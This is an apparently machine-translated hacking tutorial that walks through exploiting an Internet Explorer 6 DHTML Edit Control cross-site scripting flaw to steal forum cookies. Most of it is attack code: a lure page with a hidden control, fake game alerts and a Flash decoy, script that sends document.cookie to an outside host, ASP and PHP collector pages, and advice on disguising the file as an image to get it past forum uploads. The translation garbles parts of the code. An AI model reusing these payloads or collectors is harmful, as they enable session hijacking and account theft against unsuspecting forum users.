Microsoft last year released the MSIE DHTML Edit Control cross-site Scripting vulnerability, but the circle has not been published to use exp, harm a bunch of novice frustrated, don't worry, this is not for everyone sent a feast?!
[Affected Systems]
Microsoft Internet Explorer 6.0
-Microsoft Windows XP Professional SP1
-Microsoft Windows XP Professional
-Microsoft Windows XP Home SP1
-Microsoft Windows XP Home
-Microsoft Windows ME
-Microsoft Windows ses SE
-Microsoft Windows 98
-Microsoft Windows 2000
[Description of vulnerability]
A Microsoft Internet Explorer DHTML Edit Control incorrectly filters part of the data, which can be exploited by a remote attacker for a cross-site scripting attack for sensitive information. There is a security issue with the DHTML Edit control that can be accessed by the parent window, including the script function, where the attacker injects JavaScript directly into the control using Exescript, and when the target user opens a malicious link, it causes malicious script code execution to leak sensitive information.
It seems to affect only the IE 6.0 version, and has no effect on Windows XP SP2, but did not give XP to play SP2 patch of users, the exploit value is quite large.
Since I'm using the Windwos XP SP1 right there, let's test it and create an HTML page for the following content locally:
<title> Testing </title>
<body onload= "settimeout (' x.dom.body.innerhtml=\ ' <b> is loading, please later
++++++++++++++</b>\ '); settimeout (' Main () ', 1000) ' >
<object
Id= "X"
Classid= "CLSID:2D360201-FFF5-11D1-8D03-00A0C959BC0A"
Width= "800"
height= "600"
Align= "Middle"
>
<param name= "Activateapplets" value= "1" >
<param name= "Activateactivexcontrols" value= "1" >
</object>
<SCRIPT>
function Shellscript ()
{
Window.name= "Poorchild";
Open ("Http://www.hacker.com.cn/newbbs/announcements.asp?")
Action=showone&boardid=0 "," Poorchild ");
}
function Main ()
{
X.dom. Script.execscript (Shellscript.tostring ());
X.dom. Script.settimeout ("Shellscript ()");
Alert (' Wait ++++++++++++++++++++++++++ ');
X.dom. Script.execscript (' Alert (document.cookie) ');
}
</SCRIPT>
</body>
Open it in IE browser, and if your system has this flaw, see what appears.
Oh, popped up my cookie information on the Black Defense Forum. However, this page is very inconvenient to use, and the success rate is not high, if you do not wait until the DHTML control is loaded and click OK, it will not pop up any cookie information.
Do not wait until the page is loaded to click on the first set of pop-up, will attack failed, it seems to be insufficient. Let's add and modify this page to make it a high success rate for stealing cookie information, so let's start now.
In order to increase the load time we will first settimeout (' Main () ', 1000) in the parameters of the larger, set to 10000, that is, 10 seconds, long enough. Although the page appears to be loading, but the status bar is displayed, we modify the text of the status bar and add the following function:
function Clock () {
var title= "is loading, please ++++++++++++++ later";
Status=title;
}
In order to entice the viewer to open the page as much as possible, we renamed it a. SWF-formatted file that disguises this page as a flash file. Add to Page:
<object classid= "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id= obj1 "codebase=" http:// download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0 "border=" 0 "width=" "height=" 600 ">
<param name= "movie" value= "/college/uploadpic/2006/8/27/2006827233410827.swf" >
<param name= "Quality" value= "High" >
<embed src= "/college/uploadpic/2006/8/27/2006827233410827.swf" pluginspage= "http://www.macromedia.com/go/ Getflashplayer "type=" Application/x-shockwave-flash "name= obj1" width= "489" height= "" "quality=" High "></ Object>
Also hides the DHTML control, setting the Width,height property of the DHTML space to 0. To send the cookie, we add the following script:
X.dom. Script.execscript ("window.open" (' http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail= zhang@1.com&fdarticleid=&fdtitle=&fdlink=&func=add&s1=%b7%a2%b1%ed%c6%c0%c2%db& Fdcomments= ' +document.cookie) ");
This is for the convenience of testing, I sent the visitor's cookie information to a comment site on the internet. The final Test page is:
<title> Testing </title>
<body onload= "settimeout (' x.dom.body.innerhtml=\ ' <b> being loaded, please ++++++++++++++</b>\ later '); clock (); SetTimeout (' main () ', 10000) >
<object
Id= "X"
Classid= "CLSID:2D360201-FFF5-11D1-8D03-00A0C959BC0A"
Width= "0"
height= "0"
Align= "Middle"
>
<param name= "Activateapplets" value= "1" >
<param name= "Activateactivexcontrols" value= "1" >
</object>
<SCRIPT>
function Clock () {
var title= "is loading, please ++++++++++++++ later";
Status=title;
}
function Shellscript ()
{
Window.name= "Poorchild";
Open ("Http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0", "Poorchild");
}
function Main ()
{
X.dom. Script.execscript (Shellscript.tostring ());
X.dom. Script.settimeout ("Shellscript ()");
Alert ("Game name: Mysterious altar \ n");
Alert ("The test-pass person has the superhuman observation!") \ n ");
Alert ("Only 10 people all over the world can find out!") \ n ");
Alert ("I believe you are one of these 10)";
Alert ("Good Luck ++++++++++++++++++++\n");
Alert ("Be sure to find the difference after clicking OK!!") \ n ");
X.dom. Script.execscript (' Alert (document.cookie) ');
X.dom. Script.execscript ("window.open" (' http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail= zhang@1.com&fdarticleid=&fdtitle=&fdlink=&func=add&s1=%b7%a2%b1%ed%c6%c0%c2%db& Fdcomments= ' +document.cookie) ");
}
</SCRIPT>
<object classid= "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id= obj1 "codebase=" http:// download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0 "border=" 0 "width=" "height=" 600 ">
<param name= "movie" value= "/college/uploadpic/2006/8/27/2006827233410827.swf" >
<param name= "Quality" value= "High" >
<embed src= "/college/uploadpic/2006/8/27/2006827233410827.swf" pluginspage= "http://www.macromedia.com/go/ Getflashplayer "type=" Application/x-shockwave-flash "name= obj1" width= "489" height= "" "quality=" High "></ Object>
</body>
One of the/college/uploadpic/2006/8/27/2006827233410827.swf is a friend sent me the address, gave me a jump, but did not expect me to use it to cheat royalties, hehe.
To test, quickly go to the Black Defense Forum to publish an article, to be attractive.
Is it attractive enough? I guess a lot of strokes! In fact, we can rename the above attack file into. swf, in order to upload conveniently in the forum (not allowed SWF format), I renamed to GIF format.
Because it is exploited by IE vulnerabilities, the address of this page can be anywhere, but note:
function Shellscript ()
{
Window.name= "Poorchild";
Open ("Http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0", "Poorchild");
}
This function defines that we want to steal the browser machine site cookie information, I set up the Black Defense Forum, you can change to attack the forum. At the same time this page to select less content of the page, preferably not with pictures, in order to speed up loading time.
OK, I'll take a look at the effect first.
It seems to be a success, in order not to allow viewers to see their cookie information, you can send it to their own customized ASP pages, by supporting the ASP and FSO components in the space to build the following pages:
<%
Testfile=server.mappath ("Cookie.txt")
Cookie=request ("Cookie")
Set Fs=server. CreateObject ("Scripting.FileSystemObject")
Set THISFILE=FS. OpenTextFile (testfile,8,true,0)
Thisfile. WriteLine ("&cookie&")
Thisfile.close
Set fs = Nothing
%>
Name it cookie.asp, and be careful to modify the following:
X.dom. Script.execscript ("window.open" (' http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail= zhang@1.com&fdarticleid=&fdtitle=&fdlink=&func=add&s1=%b7%a2%b1%ed%c6%c0%c2%db& Fdcomments= ' +document.cookie) ");
To
X.dom. Script.execscript ("window.open (' http://youwebsite.com/cookie.asp?cookie= ' +document.cookie)");
or create the following pages in a space that supports PHP:
<?php
$info = getenv ("query_string");
if ($info) {
$fp = fopen ("Info.txt", "a");
Fwrite ($FP, $info. " \ n ");
Fclose ($FP);
}
Header ("location:http://wwwhacker.com.cn");
This way through this loophole, we can steal any forum cookie information, no matter how safe the forum, as long as the browser IE exists this vulnerability, you can successfully obtain someone else's cookies, this can be called the Forum Killer!
